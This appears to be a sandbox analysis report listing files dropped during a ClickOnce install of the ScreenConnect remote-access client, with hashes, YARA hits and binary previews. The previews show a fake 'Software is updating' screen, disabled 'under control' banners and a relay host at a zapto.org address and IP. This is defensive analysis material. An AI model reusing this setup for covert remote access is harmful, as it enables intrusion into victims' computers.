                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                  Entropy (8bit):4.9739376290794715
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsbxMHwercD:rHy2DLI4MWoj12K9cAudMHcD
                                                                                                                                                                                                                                                                  MD5:5A9944427C35328CB2D7E201CD705C32
                                                                                                                                                                                                                                                                  SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                                                                                                                                                                                                                                                  SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                                                                                                                                                                                                                                                  SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):257
                                                                                                                                                                                                                                                                  Entropy (8bit):4.896176001960815
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                                                                                                                                                  MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                                                                                                                                                  SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                                                                                                                                                  SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                                                                                                                                                  SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50133
                                                                                                                                                                                                                                                                  Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):26722
                                                                                                                                                                                                                                                                  Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1970
                                                                                                                                                                                                                                                                  Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                                  MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                                  SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                                  SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                                  SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                                  Entropy (8bit):5.039236886420035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/k/vXbAa3xT:2dL9hK6E46YPPvH
                                                                                                                                                                                                                                                                  MD5:74FAB4625FB05141FE3EB1BCD9C6D4D0
                                                                                                                                                                                                                                                                  SHA1:5647D1629FD1E11E058C738F3CC2850B84D939AC
                                                                                                                                                                                                                                                                  SHA-256:7AA8ECCCBEECC9CC1B1664933526A142B994B40519FC2725F215CFEA24D82C49
                                                                                                                                                                                                                                                                  SHA-512:72081FA1AB773F2E670D3F4C8FC3AB2DDE4C25B603037825FC165E7293E3C025FA84AE56076E768493A054A95AD1413BBD0504FE121F337C6076D69F9E2BD819
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2011%3a44%3a40</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                                  Entropy (8bit):5.039236886420035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/k/vXbAa3xT:2dL9hK6E46YPPvH
                                                                                                                                                                                                                                                                  MD5:74FAB4625FB05141FE3EB1BCD9C6D4D0
                                                                                                                                                                                                                                                                  SHA1:5647D1629FD1E11E058C738F3CC2850B84D939AC
                                                                                                                                                                                                                                                                  SHA-256:7AA8ECCCBEECC9CC1B1664933526A142B994B40519FC2725F215CFEA24D82C49
                                                                                                                                                                                                                                                                  SHA-512:72081FA1AB773F2E670D3F4C8FC3AB2DDE4C25B603037825FC165E7293E3C025FA84AE56076E768493A054A95AD1413BBD0504FE121F337C6076D69F9E2BD819
                                                                                                                                                                                                                                                                  Malicious:false
